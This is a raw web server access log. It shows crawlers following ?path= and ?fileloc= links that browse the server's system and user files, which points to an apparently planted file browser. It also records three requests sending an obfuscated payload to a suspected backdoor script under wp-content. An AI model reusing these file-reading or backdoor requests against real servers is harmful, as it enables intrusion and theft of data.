23.23.103.31 - - [10/Nov/2025:00:33:40 +0000] "GET /our-works/corporate/marina-plaza/?path=//lib/initramfs-tools/etc HTTP/1.1" 200 2929 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:41 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphimquangcao.net-backend.access.log.6.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/subsystem HTTP/1.1" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.236.185.101 - - [10/Nov/2025:00:33:42 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/module/async_tx/notes HTTP/1.1" 200 3006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:43 +0000] "GET /29hnr22555.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory7/node0 HTTP/1.1" 200 3948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:45 +0000] "GET /29hnr22555.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.224.104.67 - - [10/Nov/2025:00:33:46 +0000] "GET /our-works/tvc-kimino/?path=//usr/share/bug/cron HTTP/1.1" 200 3011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:33:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory6/node0 HTTP/1.1" 200 3954 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:33:48 +0000] "GET /296hfif3556.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:33:49 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Fdrivers%2Finput%2Ftablet HTTP/1.1" 200 3034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [10/Nov/2025:00:33:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory9 HTTP/1.1" 200 3392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
107.22.208.39 - - [10/Nov/2025:00:33:53 +0000] "GET /our-works/tvc-caltex-havoline/?path=//snap/lxd/current/meta HTTP/1.1" 200 3026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:54 +0000] "GET /79katri17991.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory3/node0 HTTP/1.1" 200 3951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.210.29.96 - - [10/Nov/2025:00:33:57 +0000] "GET /our-works/tvc-bia-hello/?path=//proc/sys/kernel/yama HTTP/1.1" 200 2953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:57 +0000] "GET /87wzw35841.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:33:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/hugepages HTTP/1.1" 200 3048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.84.70.201 - - [10/Nov/2025:00:33:59 +0000] "GET /our-works/tvc-bia-hello/?path=//snap/core20/current/srv HTTP/1.1" 200 2677 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:33:59 +0000] "GET /98ratda37260.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:00 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory7/node0/numastat&path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory6/node0/memory7/node0 HTTP/1.1" 200 2751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:34:04 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383332342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343732342q3336663139643766646466326130353566656433636638663534386430383439222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:34:04 +0000] "GET /64dndm48476.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.214.176.44 - - [10/Nov/2025:00:34:04 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//home/ubuntu/.bash_logout&path=//home/ubuntu HTTP/1.1" 200 2749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory12/power HTTP/1.1" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:34:06 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Flibfcgi-perl%2Fcopyright&path=%2F%2Fusr%2Fshare%2Fdoc%2Flibfcgi-perl HTTP/1.1" 200 4003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.201.155.215 - - [10/Nov/2025:00:34:06 +0000] "GET /our-works/phim-viral-ila/?path=//lib/python3.8/lib2to3 HTTP/1.1" 200 3577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:07 +0000] "GET /10txma20020.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory9/power HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:08 +0000] "GET /79katri17991.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:08 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory3/node0/meminfo&path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory3/node0 HTTP/1.1" 200 3032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.83.180.239 - - [10/Nov/2025:00:34:09 +0000] "GET /our-works/tvc-kimino/?path=//proc/25/net/netfilter HTTP/1.1" 200 2948 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:09 +0000] "GET /21wior13501.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory9/node0 HTTP/1.1" 200 3946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:11 +0000] "GET /98ratda37260.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory4 HTTP/1.1" 200 3394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:12 +0000] "GET /113mqkl1715.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:12 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/hugepages HTTP/1.1" 200 3045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.213.85.234 - - [10/Nov/2025:00:34:13 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/sg_bg_ctl&path=//bin HTTP/1.1" 200 2598 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:13 +0000] "GET /64dndm48476.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/node0 HTTP/1.1" 200 3946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:15 +0000] "GET /10txma20020.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.172 - - [10/Nov/2025:00:34:16 +0000] "GET /?products=859695050 HTTP/1.1" 200 25683 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/hugepages HTTP/1.1" 200 3048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:19 +0000] "GET /21wior13501.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.156.248.117 - - [10/Nov/2025:00:34:19 +0000] "GET /our-works/phim-viral-ila/?fileloc=//usr/bin/shuf&path=//usr/bin HTTP/1.1" 200 2604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:20 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory6/power HTTP/1.1" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:21 +0000] "GET /79katri17991.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.194.226.74 - - [10/Nov/2025:00:34:21 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//sys/module/ccp/version&path=//sys/module/ccp HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:22 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory6/power HTTP/1.1" 200 3353 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:22 +0000] "GET /64dndm48476.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [10/Nov/2025:00:34:27 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383334372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343734372q3466646331643865393539313939393565373965336530306166343730623462222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.189 - - [10/Nov/2025:00:34:27 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory6/node0/memory6 HTTP/1.1" 200 3382 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:28 +0000] "GET /77gdh10403.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:34:28 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214-generic%2Fdrivers%2Fscsi%2Faic94xx HTTP/1.1" 200 3069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.224.215.150 - - [10/Nov/2025:00:34:31 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//sys/module/ccp/version&path=//sys/module/ccp HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
40.77.167.24 - - [10/Nov/2025:00:34:31 +0000] "GET /?products=1034160422 HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory2/power HTTP/1.1" 200 3353 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.209.187.99 - - [10/Nov/2025:00:34:32 +0000] "GET /our-works/corporate/marina-plaza/?path=//proc/25/map_files HTTP/1.1" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:33 +0000] "GET /113mqkl1715.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.243.63.52 - - [10/Nov/2025:00:34:34 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//var/run/sendsigs.omit.d HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory7 HTTP/1.1" 200 3395 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:00:34:37 +0000] "GET /113mqkl1715.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.210 - - [10/Nov/2025:00:34:38 +0000] "GET /?products=300755598 HTTP/1.1" 200 24972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [10/Nov/2025:00:34:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory4/node0 HTTP/1.1" 200 3949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.175.228 - - [10/Nov/2025:00:34:40 +0000] "GET /our-works/tvc-caltex-havoline/?path=//snap/snapd/current/usr HTTP/1.1" 200 2999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:40 +0000] "GET /118hoh1842.html?fileloc=/var/www/lamphim/data/logs/lamphim.viecde.com-frontend.access.log.4.gz&path=/var/www/lamphim/data/logs HTTP/1.1" 200 2662 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory11/power HTTP/1.1" 200 3356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.224.215.150 - - [10/Nov/2025:00:34:42 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//var/run/sendsigs.omit.d HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:00:34:44 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fproc%2F3264%2Ftask%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Finclude%2Fconfig%2Fsnd%2Femu10k1 HTTP/1.1" 200 3039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:34:45 +0000] "GET /21wior13501.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory4/power HTTP/1.1" 200 3358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.27.153.9 - - [10/Nov/2025:00:34:47 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?path=//var/lib/cloud/seed HTTP/1.1" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:00:34:50 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323733383337302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733343737302q6338343130386664373162306232396665613932386566346361653037363462222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.51 - - [10/Nov/2025:00:34:50 +0000] "GET /98ratda37260.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:50 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/memory7 HTTP/1.1" 200 3392 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.193.115.232 - - [10/Nov/2025:00:34:52 +0000] "GET /our-works/tvc-calci/?path=//sys/class/tty/tty23 HTTP/1.1" 200 3088 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
114.119.156.142 - - [10/Nov/2025:00:34:53 +0000] "GET /?products=888058 HTTP/1.1" 200 4544 "https://lamphimquangcao.net/?sitemap201.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.51 - - [10/Nov/2025:00:34:53 +0000] "GET /10txma20020.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory5/power HTTP/1.1" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.199.252.22 - - [10/Nov/2025:00:34:54 +0000] "GET /our-works/tvc-jokky/?path=//lib/python3.8/multiprocessing/__pycache__ HTTP/1.1" 200 3864 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:55 +0000] "GET /56tqzva33572.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/hugepages/hugepages-2048kB HTTP/1.1" 200 3120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.210 - - [10/Nov/2025:00:34:57 +0000] "GET /?products=36697606 HTTP/1.1" 200 27107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:00:34:57 +0000] "GET /233ltqr2855.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:34:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/cpu0/node0/hugepages HTTP/1.1" 200 3061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.197.82.195 - - [10/Nov/2025:00:34:59 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?fileloc=//sys/bus/rapidio/drivers_probe&path=//sys/bus/rapidio HTTP/1.1" 200 2621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
